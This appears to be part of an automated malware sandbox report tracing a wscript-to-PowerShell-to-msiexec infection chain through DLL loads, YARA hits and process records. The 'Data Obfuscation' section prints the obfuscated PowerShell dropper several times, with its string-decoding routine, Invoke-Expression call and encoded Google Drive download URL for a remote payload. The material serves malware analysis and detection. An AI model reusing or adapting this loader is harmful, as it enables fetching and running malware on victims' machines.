              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32 source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nJPhzxOixucOn.exe, 0000000A.00000002.2965739593.000000000082E000.00000002.00000001.01000000.00000008.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2965710212.000000000082E000.00000002.00000001.01000000.00000008.sdmp
              Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dllhost.pdb source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbWP source: powershell.exe, 00000006.00000002.2131541455.00000000088F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32AC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll)g source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dllhost.pdbGCTL source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000006.00000002.2133348411.0000000009DD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2132644099.0000000008BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2116981246.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Stvners)$GLObal:gRewhOUnD = [SySTEM.tEXT.eNcodiNg]::aSCII.GeTSTRInG($bIsonOksERnEs244)$globaL:ANspnDeNDEs=$GREWHOUND.suBSTRiNg($ForSkrerbRT,$desiNfICerInGers)<#Nepotismens Bedchair E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Augurer $Roduddragningers $Skoens), (knudemndenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gasolenes = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Literalising)), $Skvatmikkel).DefineDynamicModule($Apprises, $false).DefineType($Femaarenes, $Humourers, [System.MulticastDelegate])$P
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Stvners)$GLObal:gRewhOUnD = [SySTEM.tEXT.eNcodiNg]::aSCII.GeTSTRInG($bIsonOksERnEs244)$globaL:ANspnDeNDEs=$GREWHOUND.suBSTRiNg($ForSkrerbRT,$desiNfICerInGers)<#Nepotismens Bedchair E
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7500BD pushad ; iretd 1_2_00007FFD9B7500C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0794731E push esp; ret 6_2_0794731F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07947323 push esp; ret 6_2_0794732E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079481B8 push esp; ret 6_2_079481CB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07940F2F push eax; ret 6_2_07940F41
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07947F65 push esp; ret 6_2_07947F66
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07947F6C push esp; ret 6_2_07947F7F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038009AD push ecx; mov dword ptr [esp], ecx11_2_038009B6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03101059 push 00000015h; retf 11_2_031010CD
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030FF32F push ss; retn 0000h11_2_030FF337
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F221E push edi; iretd 11_2_030F2245
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F2220 push edi; iretd 11_2_030F2245
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F3232 push 00000000h; ret 11_2_030F3247
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F3249 push 00000000h; ret 11_2_030F3247
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030EE132 push ebx; ret 11_2_030EE13E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F5171 push ecx; retf 11_2_030F518A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_031010C0 push 00000015h; retf 11_2_031010CD
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030EE794 push ds; retf 11_2_030EE7A2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F15CD push edi; iretd 11_2_030F15D2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F4BE8 push ds; retf 11_2_030F4C0E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F4BF0 push ds; retf 11_2_030F4C0E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030FB932 push eax; retf 11_2_030FB933
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F589D push B6C3BD05h; ret 11_2_030F58AC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03100F5A push es; retf 11_2_03100F91
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030EFFE0 push 3578BDFFh; retf 9DAFh11_2_030F0098
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
